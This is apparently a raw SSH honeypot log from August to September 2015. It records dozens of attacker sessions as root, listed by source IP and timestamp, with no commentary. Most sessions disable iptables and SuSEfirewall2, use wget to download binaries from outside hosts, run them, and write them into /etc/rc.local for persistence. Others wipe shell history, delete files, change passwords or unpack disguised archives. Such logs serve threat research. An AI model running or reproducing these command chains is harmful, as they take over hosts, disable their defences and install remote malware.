wget http://125.88.186.86:3306/a-xb-a chmod 777 a-xb-a
./a-xb-a
curl

From 14.157.75.11 27-Aug-2015 17:24:21 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.187.223.230:6666/25000;
chmod 777 25000;
./25000;
echo "cd /tmp/">>/etc/rc.local;
echo "./25000&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.187.223.230:6666/25000
chmod 777 25000
./25000
echo "cd /tmp/">>/etc/rc.local
echo "./25000&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 5.15.85.159 28-Aug-2015 03:10:29 ssh2 root
w
cat /etc/passwd
wget
uname -a
wget rename.altervista.org/muhnoucompilat.jpg
tar xzvf "muhnoucompilat.jpg"
rm -rf "muhnoucompilat.jpg"
cd lib
./inst
cd
ls
history

From 121.12.173.62 28-Aug-2015 09:08:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 777 pz-100;./pz-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/pz-100
chmod 777 pz-100
./pz-100

From 222.186.190.52 29-Aug-2015 13:21:57 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.190.52:8888/v9;
chmod 777 v9;
./v9;
echo "cd /tmp/">>/etc/rc.local;
echo "./v9&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.190.52:8888/36000;
chmod 777 36000;
./36000;
echo "cd /tmp/">>/etc/rc.local;
echo "./36000&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.190.52:8888/m5;
chmod 777 m5;
./m5;
echo "cd /tmp/">>/etc/rc.local;
echo "./m5&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.190.52:8888/v9
chmod 777 v9
./v9
echo "cd /tmp/">>/etc/rc.local
echo "./v9&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.190.52:8888/36000
chmod 777 36000
./36000
echo "cd /tmp/">>/etc/rc.local
echo "./36000&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.190.52:8888/m5
chmod 777 m5
./m5
echo "cd /tmp/">>/etc/rc.local
echo "./m5&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.12.173.62 30-Aug-2015 23:14:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-25;chmod 755 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/duge-25
chmod 755 duge-25
./duge-25

From 23.228.203.99 30-Aug-2015 23:33:25 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://23.228.203.98:55678/su360;
chmod 777 su360;
./su360;
echo "cd /tmp/">>/etc/rc.local;
echo "./su360&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58596;
chmod 777 s58596;
./s58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58596;
chmod 777 u58596;
./u58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/10991fuck2;
chmod 777 10991fuck2;
./10991fuck2;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck2&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://23.228.203.98:55678/su360
chmod 777 su360
./su360
echo "cd /tmp/">>/etc/rc.local
echo "./su360&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58596
chmod 777 s58596
./s58596
echo "cd /tmp/">>/etc/rc.local
echo "./s58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58596
chmod 777 u58596
./u58596
echo "cd /tmp/">>/etc/rc.local
echo "./u58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/10991fuck2
chmod 777 10991fuck2
./10991fuck2
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58595
chmod 777 s58595
./s58595
echo "cd /tmp/">>/etc/rc.local
echo "./s58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58595
chmod 777 u58595
./u58595
echo "cd /tmp/">>/etc/rc.local
echo "./u58595&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 23.228.203.99 31-Aug-2015 14:12:37 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://23.228.203.98:55678/su360;
chmod 777 su360;
./su360;
echo "cd /tmp/">>/etc/rc.local;
echo "./su360&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58596;
chmod 777 s58596;
./s58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58596;
chmod 777 u58596;
./u58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/v9;
chmod 777 v9;
./v9;
echo "cd /tmp/">>/etc/rc.local;
echo "./v9&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58597;
chmod 777 s58597;
./s58597;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58597&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58597;
chmod 777 u58597;
./u58597;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58597&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/10991fuck2;
chmod 777 10991fuck2;
./10991fuck2;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck2&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://23.228.203.98:55678/su360
chmod 777 su360
./su360
echo "cd /tmp/">>/etc/rc.local
echo "./su360&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58596
chmod 777 s58596
./s58596
echo "cd /tmp/">>/etc/rc.local
echo "./s58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58596
chmod 777 u58596
./u58596
echo "cd /tmp/">>/etc/rc.local
echo "./u58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/v9
chmod 777 v9
./v9
echo "cd /tmp/">>/etc/rc.local
echo "./v9&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58597
chmod 777 s58597
./s58597
echo "cd /tmp/">>/etc/rc.local
echo "./s58597&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58597
chmod 777 u58597
./u58597
echo "cd /tmp/">>/etc/rc.local
echo "./u58597&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/10991fuck2
chmod 777 10991fuck2
./10991fuck2
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58595

From 222.186.190.52  1-Sep-2015 14:37:57 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.190.52:8888/991;
chmod 777 991;
./991;
echo "cd /tmp/">>/etc/rc.local;
echo "./991&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.190.52:8888/991
chmod 777 991
./991
echo "cd /tmp/">>/etc/rc.local
echo "./991&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 23.228.203.99  2-Sep-2015 00:24:05 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;
rm -f *;

wget -c http://23.228.203.98:55678/s58596;
chmod 777 s58596;
./s58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58596;
chmod 777 u58596;
./u58596;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58596&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58597;
chmod 777 s58597;
./s58597;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58597&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58597;
chmod 777 u58597;
./u58597;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58597&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/10991fuck2;
chmod 777 10991fuck2;
./10991fuck2;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck2&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/v9;
chmod 777 v9;
./v9;
echo "cd /tmp/">>/etc/rc.local;
echo "./v9&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/su360;
chmod 777 su360;
./su360;
echo "cd /tmp/">>/etc/rc.local;
echo "./su360&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/s58595;
chmod 777 s58595;
./s58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./s58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/u58595;
chmod 777 u58595;
./u58595;
echo "cd /tmp/">>/etc/rc.local;
echo "./u58595&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
rm -f *
wget -c http://23.228.203.98:55678/s58596
chmod 777 s58596
./s58596
echo "cd /tmp/">>/etc/rc.local
echo "./s58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58596
chmod 777 u58596
./u58596
echo "cd /tmp/">>/etc/rc.local
echo "./u58596&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/s58597
chmod 777 s58597
./s58597
echo "cd /tmp/">>/etc/rc.local
echo "./s58597&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/u58597
chmod 777 u58597
./u58597
echo "cd /tmp/">>/etc/rc.local
echo "./u58597&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/10991fuck2
chmod 777 10991fuck2
./10991fuck2
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/v9
chmod 777 v9
./v9
echo "cd /tmp/">>/etc/rc.local
echo "./v9&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/su360
chmod 777 su360
./su360
echo "cd /tmp/">>/etc/rc.local
echo "./su360&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.190.52  2-Sep-2015 19:56:21 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.190.52:8888/v9;
chmod 777 v9;
./v9;
echo "cd /tmp/">>/etc/rc.local;
echo "./v9&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.190.52:8888/v9
chmod 777 v9
./v9
echo "cd /tmp/">>/etc/rc.local
echo "./v9&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.12.173.62  2-Sep-2015 23:41:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c httphttp://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c httphttp://121.12.173.62:81/pz-100
chmod 0755 pz-100
./pz-100

From 223.221.69.56  4-Sep-2015 06:07:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.2.0.16:7555/z;chmod 777 z;./z;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://218.2.0.16:7555/z
chmod 777 z
./z

From 180.97.220.33  4-Sep-2015 15:53:57 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;
rm -f *;

wget -c http://23.228.203.98:55678/10991fuck1;
chmod 777 10991fuck1;
./10991fuck1;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck1&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/10991fuck2;
chmod 777 10991fuck2;
./10991fuck2;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck2&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
rm -f *
wget -c http://23.228.203.98:55678/10991fuck1
chmod 777 10991fuck1
./10991fuck1
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/10991fuck2
chmod 777 10991fuck2
./10991fuck2
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.187.223.230  5-Sep-2015 21:12:21 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.187.223.230:8080/32;
chmod 777 32;
./32;
echo "cd /tmp/">>/etc/rc.local;
echo "./32&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.187.223.230:8080/64;
chmod 777 64;
./64;
echo "cd /tmp/">>/etc/rc.local;
echo "./64&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.187.223.230:8080/32
chmod 777 32
./32
echo "cd /tmp/">>/etc/rc.local
echo "./32&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.187.223.230:8080/64
chmod 777 64
./64
echo "cd /tmp/">>/etc/rc.local
echo "./64&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.97.220.33  6-Sep-2015 11:51:33 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://23.228.203.98:55678/10991fuck1;
chmod 777 10991fuck1;
./10991fuck1;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck1&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/10991fuck2;
chmod 777 10991fuck2;
./10991fuck2;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck2&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://23.228.203.98:55678/10991fuck1
chmod 777 10991fuck1
./10991fuck1
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/10991fuck2
chmod 777 10991fuck2
./10991fuck2
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 79.117.165.198  7-Sep-2015 17:09:57 ssh2 root
w
ls
clear

From 163.172.30.250  7-Sep-2015 22:03:01 ssh2 root
clear
ls
clear
passwd
clear
ls
cat /proc/cpuinfo

From 5.13.154.240  9-Sep-2015 03:21:25 ssh2 root
w
ifconfig
passwd
cd /root
passwd
yum
apt-get
apt-get install passwd
apt-get install passwd install passwd passwdtop install passwd

From 82.79.233.189  9-Sep-2015 18:00:37 ssh2 root
uname -a
uptime
cat /proc/cpuinfo
ifconfig
cat /etc/passwd
cd
cd /tmp
ls
ls Mail
cd Mail
ls
cat *
cd
passwd

From 220.170.89.225 12-Sep-2015 19:16:37 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://220.170.89.225:8080/1r;
chmod 777 1r;
./1r;
echo "cd /tmp/">>/etc/rc.local;
echo "./1r&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://220.170.89.225:8080/1r
chmod 777 1r
./1r
echo "cd /tmp/">>/etc/rc.local
echo "./1r&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.12.173.62 13-Sep-2015 08:04:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/pz-100
chmod 0755 pz-100
./pz-100

From 121.12.173.62 14-Sep-2015 04:46:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-25;chmod 777 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/duge-25
chmod 777 duge-25
./duge-25

From 176.241.185.20 17-Sep-2015 06:44:05 ssh2 root
uname -a
sudo su
znc --makeconf
uname -l
ifconf
wget
adduser
add
help
ls
add

From 121.12.173.62 17-Sep-2015 15:34:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/pz-100
chmod 0755 pz-100
./pz100

From 23.228.203.98 18-Sep-2015 21:48:37 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;
rm -f *;

wget -c http://23.228.203.98:55678/10991fuck;
chmod 777 10991fuck;
./10991fuck;
echo "cd /tmp/">>/etc/rc.local;
echo "./10991fuck&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/58595u;
chmod 777 58595u;
./58595u;
echo "cd /tmp/">>/etc/rc.local;
echo "./58595u&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://23.228.203.98:55678/58595s;
chmod 777 58595s;
./58595s;
echo "cd /tmp/">>/etc/rc.local;
echo "./58595s&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
rm -f *
wget -c http://23.228.203.98:55678/10991fuck
chmod 777 10991fuck
./10991fuck
echo "cd /tmp/">>/etc/rc.local
echo "./10991fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/58595u
chmod 777 58595u
./58595u
echo "cd /tmp/">>/etc/rc.local
echo "./58595u&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://23.228.203.98:55678/58595s
chmod 777 58595s
./58595s
echo "cd /tmp/">>/etc/rc.local
echo "./58595s&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 79.115.199.233 19-Sep-2015 02:41:41 ssh2 root
unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST
w
ls -a

From 1.55.239.7 19-Sep-2015 07:34:45 ssh2 root
uname -a
w
cat /etc/issue
perl

From 1.55.239.7 19-Sep-2015 12:27:49 ssh2 root
cat .bash_
pwd

From 1.55.239.7 19-Sep-2015 17:20:53 ssh2 root
cd /lib ls -a

From 1.55.239.7 19-Sep-2015 22:13:57 ssh2 root
wget loss.at.ua/autopsy.tgz
tar xvf autopsy.tgz
rm -rf autopsy.tgz
cd .bash
chmod +x *
./autorun
./run
wget loss.at.ua/autopsy.tgz
tar xvf autopsy.tgz
rm -rf autopsy.tgz
cd .bash
chmod +x *
./autorun
./run

From 1.55.239.7 20-Sep-2015 03:07:01 ssh2 root
ftp loss.at.ua
cat /proc/cpuinfo
yum install perl
apt-get install perl
perl

From 79.115.199.233 20-Sep-2015 07:19:29 ssh2 root
unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST
ls -a
rm -rf .bash_history
ls -a
rm -rf *
ls -a
reboot
restart
exit

From 74.208.147.106 20-Sep-2015 08:00:05 ssh2 root
w
ps -x
pwrl
perl
wget
ps -x
cat /proc/cpuinfo
ifconfig
uname -a
apt-get install yum
cat /etc/issue
name -a
perl
yum install perl
wget loss.at.ua/autopsy.tgz
wget loss -c
get
wget -c loss.at.ua/autopsy.tgz
tar xvf autopsy.tgz
rm -rf autopsy.tgz
cd .bash
chmod +x *
./autorun
./run
apt-get install ftp
ap-0t-get update
ap-0
apt-get update
apt-get upgrade
yum
apt-get
apt-get update
cat /etc/passwd
ls -a
ps -x

From 1.55.239.7 20-Sep-2015 12:53:09 ssh2 root
ifconfig
exit

From 79.115.199.233 20-Sep-2015 17:46:13 ssh2 root
unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST
ls -a
rm -rf .bash_history
ls -a
rm -rf *
ls -a
rebppt
reboot
restart
exit

From 121.12.173.62 21-Sep-2015 02:22:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:85/jiao91;chmod 755 jiao91;./jiao91;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:85/jiao91
chmod 755 jiao91
./jiao91

From 121.12.173.62 21-Sep-2015 12:43:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/ssd;chmod 755 ssd;./ssd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/ssd
chmod 755 ssd
./ssd

From 121.12.173.62 21-Sep-2015 23:04:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-100;chmod 777 duge-100;./duge-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/duge-100
chmod 777 duge-100
./duge-100

From 46.101.0.61 23-Sep-2015 04:23:01 ssh2 root
w
wget http://i9x0.com/tools/bnc.jpg
uname -a

From 46.101.0.61 23-Sep-2015 09:16:05 ssh2 root
curl -O http://i9x0.com/tools/bnc.jpg

From 187.157.22.131 23-Sep-2015 14:09:09 ssh2 root
history

From 81.18.92.114 24-Sep-2015 09:41:25 ssh2 root
w
uname -a
cat /proc/cpuinfo
exit

From 176.241.185.20 28-Sep-2015 11:22:45 ssh2 root
uname -l
uname -a
ls
ifconfig
passwd

From 50.21.183.44 28-Sep-2015 16:15:49 ssh2 root
znc --makeconf
make
apt
apt-get
apt-get install znc
znc --makeconf
znc

From 176.241.185.20 28-Sep-2015 21:08:53 ssh2 root
znc
exit

From 221.12.62.162 29-Sep-2015 02:01:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/juntao;chmod 777 juntao;sh juntao;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://221.12.62.162:5382/juntao
chmod 777 juntao
sh juntao

From 221.12.62.162 29-Sep-2015 06:55:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget -c http://221.12.62.162:5382/juntao;chmod 777 juntao;sh juntao;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget -c http://221.12.62.162:5382/juntao
chmod 777 juntao
sh juntao

From 221.12.62.162 29-Sep-2015 11:48:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/Lxw1;chmod 777 Lxw1;sh Lxw1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://221.12.62.162:5382/Lxw1
chmod 777 Lxw1
sh Lxw1

From 221.12.62.162 29-Sep-2015 21:34:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/lxw520;chmod 777 lxw520;sh lxw520;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://221.12.62.162:5382/lxw520
chmod 777 lxw520
sh lxw520

From 112.198.78.39 30-Sep-2015 12:13:25 ssh2 root
ps x
dir

From 176.241.185.20 30-Sep-2015 17:06:29 ssh2 root
uname -a
exit
ps x
adduser
add
-uname

